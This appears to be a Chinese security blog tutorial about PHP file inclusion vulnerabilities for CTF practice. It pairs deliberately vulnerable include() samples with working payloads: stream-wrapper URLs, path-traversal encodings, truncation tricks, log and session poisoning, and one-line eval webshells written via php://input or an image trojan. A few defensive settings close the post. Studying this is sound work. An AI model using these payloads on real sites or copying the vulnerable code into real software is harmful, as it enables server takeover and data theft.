<!DOCTYPE html>
<html lang="">





<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="https://s2.ax1x.com/2019/10/30/K5JmBF.png">
  <link rel="icon" type="image/png" href="https://s2.ax1x.com/2019/10/30/K5JenU.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  <meta name="description" content="Lethe&#39;s Blog">
  <meta name="author" content="Lethe">
  <meta name="keywords" content="Lethe&#39;s Blog">
  <title>文件包含漏洞总结 ~ Lethe | 忘川</title>
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/fluid-dev/hexo-theme-fluid@1.5.1/source/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/fluid-dev/hexo-theme-fluid@1.5.1/source/lib/bootstrap/css/bootstrap.min.css">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/fluid-dev/hexo-theme-fluid@1.5.1/source/lib/mdbootstrap/css/mdb.min.css">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/fluid-dev/hexo-theme-fluid@1.5.1/source/lib/github-markdown/github-markdown.min.css">
  <link rel="stylesheet" href="https://at.alicdn.com/t/font_1067060_qzomjdt8bmp.css">
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/fluid-dev/hexo-theme-fluid@1.5.1/source/lib/prettify/tomorrow-night-eighties.min.css">
  
  <link rel="stylesheet" href="/css/main.css">

  
</head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">&nbsp;<strong>Lethe | 忘川</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          <li class="nav-item">
            <a class="nav-link" href="/">Home</a>
          </li>
        
          
          
          <li class="nav-item">
            <a class="nav-link" href="/archives/">Archives</a>
          </li>
        
          
          
          <li class="nav-item">
            <a class="nav-link" href="/categories/">Categories</a>
          </li>
        
          
          
          <li class="nav-item">
            <a class="nav-link" href="/tags/">Tags</a>
          </li>
        
          
          
          <li class="nav-item">
            <a class="nav-link" href="/about/">About</a>
          </li>
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;&nbsp;<i class="iconfont icon-search"></i>&nbsp;&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>


</nav>

    <div class="view intro-2" id="background"
         style="background: url('https://s2.ax1x.com/2019/10/30/K5Jp7Q.jpg')no-repeat center center;
           background-size: cover;
           background-attachment: fixed;">
      <div class="full-bg-img">
        <div class="mask rgba-black-light flex-center">
          <div class="container text-center white-text fadeInUp">
            <span class="h2" id="subtitle">
              
            </span>

            
              <br>
              <p class="mt-3">Wednesday, February 13th 2019, 12:15 am</p>
            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="py-5 z-depth-3" id="board">
        <div class="post-content mx-auto">
          <div class="markdown-body">
            <h2><span id="0x01-什么是文件包含漏洞">0x01 什么是文件包含漏洞</span></h2><p>通过PHP函数引入文件时，传入的文件名没有经过合理的验证，从而操作了预想之外的文件，就可能导致意外的文件泄漏甚至恶意代码注入。<br><br></p>
<h2><span id="0x02-文件包含漏洞的环境要求">0x02 文件包含漏洞的环境要求</span></h2><ul>
<li>allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据</li>
<li>allow_url_include=On(php5.2之后默认为Off) 规定是否允许include/require远程文件<br><br></li>
</ul>
<h2><span id="0x03-常见文件包含函数">0x03 常见文件包含函数</span></h2><p>php中常见的文件包含函数有以下四种：</p>
<ul>
<li>include()</li>
<li>require()</li>
<li>include_once()</li>
<li><p>require()_once()</p>
<p>include与require基本是相同的，除了错误处理方面:</p>
</li>
<li>include()，只生成警告（E_WARNING），并且脚本会继续</li>
<li>require()，会生成致命错误（E_COMPILE_ERROR）并停止脚本</li>
<li>include_once()与require()_once()，如果文件已包含，则不会包含，其他特性如上<br><br></li>
</ul>
<h2><span id="0x04-php伪协议">0x04  PHP伪协议</span></h2><p>PHP 提供了一些杂项输入/输出（IO）流，允许访问 PHP 的输入输出流、标准输入输出和错误描述符， 内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。</p>
<h3><span id="一-phpinput">一、php://input</span></h3><p><strong>php://input</strong>可以访问请求的原始数据的只读流，将post请求的数据当作php代码执行。当传入的参数作为文件名打开时，可以将参数设为php://input,同时post想设置的文件内容，php执行时会将post内容当作文件内容。从而导致任意代码执行。<br><img src="/2019/02/13/文件包含漏洞总结/20190212171710961.png" srcset="/img/loading.gif" alt="在这里插入图片描述"></p>
<p><strong>Example 1：</strong> 造成任意代码执行</p>
<pre><code class="php">&lt;meta charset=&quot;utf8&quot;&gt;
&lt;?php
error_reporting(0);
$file = $_GET[&quot;file&quot;];
if(stristr($file,&quot;php://filter&quot;) || stristr($file,&quot;zip://&quot;) || stristr($file,&quot;phar://&quot;) || stristr($file,&quot;data:&quot;)){
    exit(&#39;hacker!&#39;);
}
if($file){
    if ($file!=&quot;http://www.baidu.com&quot;) echo &quot;tips：flag在当前目录的某个文件中&quot;;
    include($file);
}else{
    echo &#39;&lt;a href=&quot;?file=http://www.baidu.com&quot;&gt;click go baidu&lt;/a&gt;&#39;;
}
?&gt;
</code></pre>
<p><img src="/2019/02/13/文件包含漏洞总结/20190212171849262.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQyMTgxNDI4,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" alt="在这里插入图片描述"><br><img src="/2019/02/13/文件包含漏洞总结/20190212172017164.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQyMTgxNDI4,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" alt="在这里插入图片描述"><br><img src="/2019/02/13/文件包含漏洞总结/20190212185213880.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQyMTgxNDI4,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" alt="在这里插入图片描述"><br>注：利用php://input还可以写入php木马,即在post中传入如下代码：</p>
<pre><code>&lt;?PHP fputs(fopen(&#39;shell.php&#39;,&#39;w&#39;),&#39;&lt;?php @eval($_POST[cmd])?&gt;&#39;);?&gt;
</code></pre><p><strong>Example 2：</strong> 文件内容绕过</p>
<pre><code class="php">//test.php
&lt;?php
show_source(__FILE__);
include(&#39;flag.php&#39;);
$a= $_GET[&quot;a&quot;];
if(isset($a)&amp;&amp;(file_get_contents($a,&#39;r&#39;)) === &#39;I want flag&#39;){
    echo &quot;success\n&quot;;
    echo $flag;
}

//flag.php
&lt;?php
$flag = &#39;flag{flag_is_here}&#39;;
?&gt;
</code></pre>
<p>审计test.php知，当参数\$a不为空，且读取的文件中包含’I want flag’时，即可显示\$flag。所以可以使用php://input得到原始的post数据,访问请求的原始数据的只读流,将post请求中的数据作为PHP代码执行来进行绕过。<br>注：遇到file_get_contents()要想到用php://input绕过。</p>
<p><img src="/2019/02/13/文件包含漏洞总结/20190212173415247.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQyMTgxNDI4,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" alt="在这里插入图片描述"></p>
<h3><span id="二-phpfilter">二、php://filter</span></h3><p><strong>php://filter</strong>可以获取指定文件源码。当它与包含函数结合时，php://filter流会被当作php文件执行。所以我们一般对其进行编码，让其不执行。从而导致 任意文件读取。<br><img src="/2019/02/13/文件包含漏洞总结/20190212181216425.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br><img src="/2019/02/13/文件包含漏洞总结/20190212181226147.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br>POC1直接读取xxx.php文件，但大多数时候很多信息无法直接显示在浏览器页面上，所以需要采取POC2中方法将文件内容进行base64编码后显示在浏览器上，再自行解码。</p>
<p>注：更多php://filter用法可参考：<a href="https://www.leavesongs.com/PENETRATION/php-filter-magic.html" target="_blank" rel="noopener">谈一谈php://filter的妙用</a></p>
<p><strong>Example 1：</strong></p>
<pre><code class="php">&lt;meta charset=&quot;utf8&quot;&gt;
&lt;?php
error_reporting(0);
$file = $_GET[&quot;file&quot;];
if(stristr($file,&quot;php://input&quot;) || stristr($file,&quot;zip://&quot;) || stristr($file,&quot;phar://&quot;) || stristr($file,&quot;data:&quot;)){
    exit(&#39;hacker!&#39;);
}
if($file){
    include($file);
}else{
    echo &#39;&lt;a href=&quot;?file=flag.php&quot;&gt;tips&lt;/a&gt;&#39;;
}
?&gt;
</code></pre>
<p>1.点击tip后进入如下页面，看到url中出现‘file=flag.php’，如下：<br><img src="/2019/02/13/文件包含漏洞总结/20190212181928339.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQyMTgxNDI4,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" alt="在这里插入图片描述"><br>2.尝试payload：?php://filter/resource=flag.php，发现无法显示内容：<br><img src="/2019/02/13/文件包含漏洞总结/20190212182033920.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQyMTgxNDI4,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" alt="在这里插入图片描述"><br>3.尝试payload：?php://filter/read=convert.base64-encode/resource=flag.php，得到一串base64字符，解码得flag在flag.php源码中的注释里：</p>
<p><img src="/2019/02/13/文件包含漏洞总结/20190212182541177.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQyMTgxNDI4,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" alt="在这里插入图片描述"></p>
<h3><span id="三-zip">三、zip://</span></h3><p><strong>zip://</strong> 可以访问压缩包里面的文件。当它与包含函数结合时，zip://流会被当作php文件执行。从而实现任意代码执行。</p>
<ul>
<li>zip://中只能传入绝对路径。</li>
<li>要用#分隔压缩包和压缩包里的内容，并且#要用url编码%23（即下述POC中#要用%23替换）</li>
<li>只需要是zip的压缩包即可，后缀名可以任意更改。</li>
<li>相同的类型的还有zlib://和bzip2://<br><img src="/2019/02/13/文件包含漏洞总结/2019021218350876.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br><strong>Example 1：</strong><pre><code class="php">//index.php
&lt;meta charset=&quot;utf8&quot;&gt;
&lt;?php
error_reporting(0);
$file = $_GET[&quot;file&quot;];
if (!$file) echo &#39;&lt;a href=&quot;?file=upload&quot;&gt;upload?&lt;/a&gt;&#39;;
if(stristr($file,&quot;input&quot;)||stristr($file, &quot;filter&quot;)||stristr($file,&quot;data&quot;)/*||stristr($file,&quot;phar&quot;)*/){
  echo &quot;hick?&quot;;
  exit();
}else{
  include($file.&quot;.php&quot;);
}
?&gt;
&lt;!-- flag在当前目录的某个文件中 --&gt;
</code></pre>
<pre><code class="php">//upload.php
&lt;meta charset=&quot;utf-8&quot;&gt;
&lt;form action=&quot;upload.php&quot; method=&quot;post&quot; enctype=&quot;multipart/form-data&quot; &gt;
   &lt;input type=&quot;file&quot; name=&quot;fupload&quot; /&gt;
   &lt;input type=&quot;submit&quot; value=&quot;upload!&quot; /&gt;
&lt;/form&gt;
you can upload jpg,png,zip....&lt;br /&gt;
&lt;?php
if( isset( $_FILES[&#39;fupload&#39;] ) ) {
  $uploaded_name = $_FILES[ &#39;fupload&#39; ][ &#39;name&#39; ];         //文件名
  $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, &#39;.&#39; ) + 1);   //文件后缀
  $uploaded_size = $_FILES[ &#39;fupload&#39; ][ &#39;size&#39; ];         //文件大小
  $uploaded_tmp  = $_FILES[ &#39;fupload&#39; ][ &#39;tmp_name&#39; ];     // 存储在服务器的文件的临时副本的名称
  $target_path = &quot;uploads\\&quot;.md5(uniqid(rand())).&quot;.&quot;.$uploaded_ext;
  if( ( strtolower( $uploaded_ext ) == &quot;jpg&quot; || strtolower( $uploaded_ext ) == &quot;jpeg&quot; || strtolower( $uploaded_ext ) == &quot;png&quot; || strtolower( $uploaded_ext ) == &quot;zip&quot; ) &amp;&amp;
      ( $uploaded_size &lt; 100000 ) ) {
      if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {// No
          echo &#39;&lt;pre&gt;upload error&lt;/pre&gt;&#39;;
      }
      else {// Yes!
          echo &quot;&lt;pre&gt;&quot;.dirname(__FILE__).&quot;\\{$target_path} succesfully uploaded!&lt;/pre&gt;&quot;;
      }
  }
  else {
      echo &#39;&lt;pre&gt;you can upload jpg,png,zip....&lt;/pre&gt;&#39;;
  }
}
?&gt;
</code></pre>
</li>
</ul>
<h3><span id="四-data与phar">四、data://与phar://</span></h3><p><strong>data://</strong> 同样类似与php://input，可以让用户来控制输入流，当它与包含函数结合时，用户输入的data://流会被当作php文件执行。从而导致任意代码执行。<br><img src="/2019/02/13/文件包含漏洞总结/20190212184105566.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQyMTgxNDI4,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" alt="在这里插入图片描述"></p>
<p><strong>phar://</strong> 有点类似zip://同样可以导致 任意代码执行。</p>
<ul>
<li>phar://中相对路径和绝对路径都可以使用<br><img src="/2019/02/13/文件包含漏洞总结/20190212183933220.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br><br><h2><span id="0x05-包含apache日志文件">0x05 包含Apache日志文件</span></h2>&emsp;&emsp;WEB服务器一般会将用户的访问记录保存在访问日志中。那么我们可以根据日志记录的内容，精心构造请求，把PHP代码插入到日志文件中，通过文件包含漏洞来执行日志中的PHP代码。<br><img src="/2019/02/13/文件包含漏洞总结/20190212212338582.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br><img src="/2019/02/13/文件包含漏洞总结/20190212212352893.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br>&emsp;&emsp;Apache运行后一般默认会生成两个日志文件，Windos下是access.log（访问日志）和error.log(错误日志)，Linux下是access_log和error_log，访问日志文件记录了客户端的每次请求和服务器响应的相关信息。<br>&emsp;&emsp;如果访问一个不存在的资源时，如<a href="http://www.xxxx.com/" target="_blank" rel="noopener">http://www.xxxx.com/</a>&lt;?php phpinfo(); ?&gt;,则会记录在日志中，但是代码中的敏感字符会被浏览器转码，我们可以通过burpsuit绕过编码，就可以把&lt;?php phpinfo(); ?&gt;  写入apache的日志文件，然后可以通过包含日志文件来执行此代码，但前提是你得知道apache日志文件的存储路径，所以为了安全期间，安装apache时尽量不要使用默认路径。</li>
</ul>
<p>参考文章：<a href="https://www.cnblogs.com/my1e3/p/5854897.html" target="_blank" rel="noopener">1.包含日志文件getshell</a><br>&emsp;&emsp;&emsp;&emsp;&emsp;<a href="https://chybeta.github.io/2017/08/06/SHACTF-2017-Web-writeup/#Methon-Two" target="_blank" rel="noopener">2.一道包含日志文件的CTF题</a><br><br></p>
<h2><span id="0x06-包含session">0x06 包含SESSION</span></h2><p>可以先根据尝试包含到SESSION文件，在根据文件内容寻找可控变量，在构造payload插入到文件中，最后包含即可。</p>
<p><strong>利用条件：</strong></p>
<ul>
<li>找到Session内的可控变量</li>
<li>Session文件可读写，并且知道存储路径</li>
</ul>
<p>php的session文件的保存路径可以在phpinfo的session.save_path看到。<br><img src="https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20171009/14.png?raw=true" srcset="/img/loading.gif" alt="在这里插入图片描述"><br><strong>session常见存储路径：</strong></p>
<ul>
<li>/var/lib/php/sess_PHPSESSID</li>
<li>/var/lib/php/sess_PHPSESSID</li>
<li>/tmp/sess_PHPSESSID</li>
<li>/tmp/sessions/sess_PHPSESSID</li>
<li>session文件格式： sess_[phpsessid] ，而 phpsessid 在发送的请求的 cookie 字段中可以看到。</li>
</ul>
<p>参考文章：<a href="https://chybeta.github.io/2017/11/09/%E4%B8%80%E9%81%93CTF%E9%A2%98%EF%BC%9APHP%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" target="_blank" rel="noopener">一道SESSION包含的CTF题</a><br><br></p>
<h2><span id="0x06-包含prosselfenviron">0x06 包含/pros/self/environ</span></h2><p>proc/self/environ中会保存user-agent头，如果在user-agent中插入php代码，则php代码会被写入到environ中，之后再包含它，即可。</p>
<p><strong>利用条件：</strong></p>
<ul>
<li>php以cgi方式运行，这样environ才会保持UA头。</li>
<li>environ文件存储位置已知，且environ文件可读。</li>
</ul>
<p>参考文章：<a href="http://websecuritylog.blogspot.com/2010/06/procselfenviron-injection.html" target="_blank" rel="noopener">proc / self / environ Injection</a><br><br></p>
<h2><span id="0x07-包含临时文件">0x07 包含临时文件</span></h2><p><img src="/2019/02/13/文件包含漏洞总结/1.jpg" srcset="/img/loading.gif" alt="在这里插入图片描述"><br>php中上传文件，会创建临时文件。在linux下使用/tmp目录，而在windows下使用c:\winsdows\temp目录。在临时文件被删除之前，利用竞争即可包含该临时文件。</p>
<p>由于包含需要知道包含的文件名。一种方法是进行暴力猜解，linux下使用的随机函数有缺陷，而window下只有65535中不同的文件名，所以这个方法是可行的。</p>
<p>另一种方法是配合phpinfo页面的php variables，可以直接获取到上传文件的存储路径和临时文件名，直接包含即可。这个方法可以参考<a href="https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf" target="_blank" rel="noopener">LFI With PHPInfo Assistance</a></p>
<p>类似利用临时文件的存在，竞争时间去包含的，可以看看这道CTF题：<a href="https://chybeta.github.io/2017/08/22/XMAN%E5%A4%8F%E4%BB%A4%E8%90%A5-2017-babyweb-writeup/" target="_blank" rel="noopener">XMAN夏令营-2017-babyweb-writeup</a><br><br></p>
<h2><span id="0x08-包含上传文件">0x08 包含上传文件</span></h2><p>很多网站通常会提供文件上传功能，比如：上传头像、文档等，这时就可以采取上传一句话图片木马的方式进行包含。</p>
<p>图片马的制作方式如下，在cmd控制台下输入：</p>
<pre><code>进入1.jph和2.php的文件目录后，执行：

copy  1.jpg/b+2.php  3.jpg

将图片1.jpg和包含php代码的2.php文件合并生成图片马3.jpg
</code></pre><p>假设已经上传一句话图片木马到服务器，路径为<code>/upload/201811.jpg</code><br>图片代码如下：</p>
<pre><code>&lt;?fputs(fopen(&quot;shell.php&quot;,&quot;w&quot;),&quot;&lt;?php eval($_POST[&#39;pass&#39;]);?&gt;&quot;)?&gt;
</code></pre><p>然后访问URL：<code>http://www.xxxx.com/index.php?page=./upload/201811.jpg</code>，包含这张图片，将会在<code>index.php</code>所在的目录下生成<code>shell.php</code><br><br></p>
<h2><span id="0x09-其他包含姿势">0x09 其他包含姿势</span></h2><ul>
<li>包含SMTP(日志)</li>
<li>包含xss<br><br><br><br></li>
</ul>
<h1><span id="文件包含漏洞的绕过方法">文件包含漏洞的绕过方法</span></h1><p><br></p>
<h2><span id="0x09-指定前缀绕过">0x09 指定前缀绕过</span></h2><h3><span id="一-目录遍历">一、目录遍历</span></h3><p>使用 ../../ 来返回上一目录，被称为目录遍历(Path Traversal)。例如 ?file=../../phpinfo/phpinfo.php<br>测试代码如下：</p>
<pre><code class="php">&lt;?php
    error_reporting(0);
    $file = $_GET[&quot;file&quot;];
    //前缀
    include &quot;/var/www/html/&quot;.$file;

    highlight_file(__FILE__);
?&gt;
</code></pre>
<p>现在在/var/log目录下有文件flag.txt，则利用../可以进行目录遍历，比如我们尝试访问：</p>
<pre><code> include.php?file=../../log/flag.txt
</code></pre><p>则服务器端实际拼接出来的路径为：/var/www/html/../../log/test.txt，即 /var/log/flag.txt，从而包含成功。</p>
<h3><span id="二-编码绕过">二、编码绕过</span></h3><p>服务器端常常会对于../等做一些过滤，可以用一些编码来进行绕过。<br><strong>1.利用url编码</strong></p>
<ul>
<li><p>../</p>
<ul>
<li>%2e%2e%2f</li>
<li>..%2f</li>
<li>%2e%2e/</li>
</ul>
</li>
<li><p>..\</p>
<ul>
<li>%2e%2e%5c</li>
<li>..%5c</li>
<li>%2e%2e\</li>
</ul>
</li>
</ul>
<p><strong>2.二次编码</strong></p>
<ul>
<li>../<ul>
<li>%252e%252e%252f</li>
</ul>
</li>
<li>..\<ul>
<li>%252e%252e%255c</li>
</ul>
</li>
</ul>
<p><strong>3.容器/服务器的编码方式</strong></p>
<ul>
<li><p>../</p>
<ul>
<li><p>..%c0%af</p>
<ul>
<li>注：<a href="https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work" target="_blank" rel="noopener">Why does Directory traversal attack %C0%AF work?</a></li>
</ul>
</li>
<li><p>%c0%ae%c0%ae/</p>
<ul>
<li>注：java中会把”%c0%ae”解析为”\uC0AE”，最后转义为ASCCII字符的”.”（点）<br>Apache Tomcat Directory Traversal</li>
</ul>
</li>
</ul>
</li>
<li><p>..\</p>
<ul>
<li>..%c1%9c</li>
</ul>
</li>
</ul>
<p><br></p>
<h2><span id="0x10-指定后缀绕过">0x10 指定后缀绕过</span></h2><p>后缀绕过测试代码如下，下述各后缀绕过方法均使用此代码：</p>
<pre><code class="php">&lt;?php
    error_reporting(0);
    $file = $_GET[&quot;file&quot;];
    //后缀
    include $file.&quot;.txt&quot;;

    highlight_file(__FILE__);
?&gt;
</code></pre>
<h3><span id="一-利用url">一、利用url</span></h3><p>在远程文件包含漏洞（RFI）中，可以利用query或fragment来绕过后缀限制。<br>可参考此文章：<a href="https://www.jianshu.com/p/2c07fbb52b45" target="_blank" rel="noopener">URI’s fragment</a></p>
<p>完整url格式：</p>
<pre><code>protocol :// hostname[:port] / path / [;parameters][?query]#fragment
</code></pre><p><strong>query(?)</strong></p>
<ul>
<li>[访问参数]   <code>?file=http://localhost:8081/phpinfo.php?</code></li>
<li>[拼接后] &emsp;<code>?file=http://localhost:8081/phpinfo.php?.txt</code></li>
</ul>
<p><strong>Example：</strong>（设在根目录下有flag2.txt文件）<br><img src="/2019/02/13/文件包含漏洞总结/2019021223193847.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQyMTgxNDI4,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" alt="在这里插入图片描述"><br><img src="/2019/02/13/文件包含漏洞总结/20190212231954243.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQyMTgxNDI4,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" alt="在这里插入图片描述"><br><strong>fragment(#)</strong></p>
<ul>
<li>[访问参数]   <code>?file=http://localhost:8081/phpinfo.php%23</code></li>
<li><p>[拼接后]&emsp; <code>?file=http://localhost:8081/phpinfo.php#.txt</code></p>
<p><strong>Example：</strong>（设在根目录下有flag2.txt文件）<br><img src="/2019/02/13/文件包含漏洞总结/20190212232732360.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQyMTgxNDI4,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" alt="在这里插入图片描述"><br><img src="/2019/02/13/文件包含漏洞总结/2019021223280591.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQyMTgxNDI4,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" alt="在这里插入图片描述"></p>
<h3><span id="二-利用协议">二、利用协议</span></h3><p>利用zip://和phar://，由于整个压缩包都是我们的可控参数，那么只需要知道他们的后缀，便可以自己构建。</p>
</li>
</ul>
<p><strong>zip://</strong></p>
<ul>
<li>[访问参数]   <code>?file=zip://D:\zip.jpg%23phpinfo</code></li>
<li>[拼接后] &emsp;<code>?file=zip://D:\zip.jpg#phpinfo.txt</code></li>
</ul>
<p><strong>phar://</strong></p>
<ul>
<li>[访问参数]   <code>?file=phar://zip.zip/phpinfo</code></li>
<li>[拼接后] &emsp;<code>?file=phar://zip.zip/phpinfo.txt</code></li>
</ul>
<p><strong>Example：</strong><br>(我的环境根目录中有php.zip压缩包，内含phpinfo.txt，其中包含代码&lt;?php phpinfo();?&gt;)）<br>所以分别构造payload为：</p>
<p><code>?file=zip://D:\PHPWAMP_IN3\wwwroot\php.zip%23phpinfo</code><br><img src="/2019/02/13/文件包含漏洞总结/20190212234709548.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQyMTgxNDI4,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" alt="在这里插入图片描述"><br><code>?file=phar://../../php.zip/phpinfo</code><br><img src="/2019/02/13/文件包含漏洞总结/20190212234725870.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQyMTgxNDI4,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" alt="在这里插入图片描述"></p>
<h3><span id="三-长度截断">三、长度截断</span></h3><p><strong>利用条件：</strong> </p>
<ul>
<li>php版本 &lt; php 5.2.8</li>
</ul>
<p><strong>原理：</strong></p>
<ul>
<li>Windows下目录最大长度为256字节，超出的部分会被丢弃</li>
<li><p>Linux下目录最大长度为4096字节，超出的部分会被丢弃。</p>
<p><strong>利用方法：</strong></p>
</li>
</ul>
<ul>
<li><p>只需要不断的重复 ./(Windows系统下也可以直接用 . 截断)</p>
<pre><code>  ?file=./././。。。省略。。。././shell.php
</code></pre></li>
</ul>
<p>则指定的后缀.txt会在达到最大值后会被直接丢弃掉</p>
<h3><span id="四-00截断">四、%00截断</span></h3><p><strong>利用条件：</strong></p>
<ul>
<li>magic_quotes_gpc = Off </li>
<li>php版本 &lt; php 5.3.4</li>
</ul>
<p><strong>利用方法：</strong></p>
<ul>
<li><p>直接在文件名的最后加上%00来截断指定的后缀名</p>
<pre><code>  ?file=shell.php%00
</code></pre></li>
</ul>
<p>注：现在用到%00阶段的情况已经不多了</p>
<p><br><br><br></p>
<h1><span id="文件包含漏洞防御">文件包含漏洞防御</span></h1><p><br></p>
<ul>
<li><strong>allow_url_include和allow_url_fopen最小权限化</strong></li>
<li><p><strong>设置open_basedir（open_basedir 将php所能打开的文件限制在指定的目录树中）</strong></p>
</li>
<li><p><strong>白名单限制包含文件，或者严格过滤 . \/ \</strong></p>
</li>
</ul>

            <hr>
          </div>
          <br>
          <div>
            
              <p>
                <i class="iconfont icon-inbox"></i>
                
                  <a class="hover-with-bg" href="/categories/CTF">CTF</a>
                  &nbsp;
                
              </p>
            
            <p>
              <i class="iconfont icon-tag"></i>
              
                <a class="hover-with-bg" href="/tags/CTF">CTF</a>
              
            </p>
            
              <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a href="https://zh.wikipedia.org/wiki/Wikipedia:CC_BY-SA_3.0%E5%8D%8F%E8%AE%AE%E6%96%87%E6%9C%AC" rel="nofollow noopener">CC BY-SA 3.0协议</a> 。转载请注明出处！</p>
            
          </div>
        </div>
      </div>
    </div>
    <div class="d-none d-lg-block col-lg-2 toc-container">
      
  <div id="toc">
    <p class="h4"><i class="far fa-list-alt"></i>&nbsp;目录</p>
    <div id="tocbot"></div>
  </div>

    </div>
  </div>
</div>

<!-- custom -->


<!-- Comments -->
<div class="col-lg-7 mx-auto nopadding-md">
  <div class="container comments mx-auto" id="comments">
    
      <br><br>
      
      <div class="disqus" style="width:100%">
  <div id="disqus_thread"></div>
  <script>
    var disqus_shortname = 'Lethe';
    var disqus_config = function () {
      this.page.url = 'https://lethe.site/2019/02/13/文件包含漏洞总结/';
      this.page.identifier = '/2019/02/13/文件包含漏洞总结/';
    };
    (function () {
      var d = document, s = d.createElement('script');
      s.type = 'text/javascript';
      s.src = '//' + disqus_shortname + '.disqus.com/embed.js';
      s.setAttribute('data-timestamp', +new Date());
      (d.head || d.body).appendChild(s);
    })();
  </script>
  <noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow noopener">comments
      powered by Disqus.</a></noscript>
</div>
    
  </div>
</div>

    
  </main>

  
    <a class="z-depth-1" id="scroll-top-button" href="#" role="button">
      <i class="fa fa-chevron-up scroll-top-arrow" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel" aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
